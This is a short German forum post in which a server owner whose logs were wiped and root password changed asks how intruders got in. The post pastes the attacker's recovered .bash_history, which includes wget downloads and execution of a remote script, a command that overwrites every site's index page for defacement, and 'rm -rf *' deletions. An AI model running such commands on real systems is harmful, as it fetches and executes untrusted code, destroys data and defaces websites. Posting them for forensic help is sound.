hat mir jemand einen Tipp wie ich ermitteln kann wie sie auf den Server gekommen sind ?? :evil:
Meine logs sind gelöscht . Das rootpassword ist geändert .
Ich habe folgendes in .bash_history gefunden.
id
rm -rf *
ls
locate httpd.conf
cd /var/www/virtual/
ls
cd /tmp
ls
wget http://www.securebi0s.hpg.com.br/index.txt
mv index.txt index.html
find /var/www/virtual/*/htdocs/ -name "index.*" -exec cp /tmp/index.html {} ;
ls
w
wget http://www.securebi0s.hpg.com.br/bi0sinfo.sh
chmod +x bi0sinfo.sh
./bi0sinfo.sh
rm -rf *
ls
pwd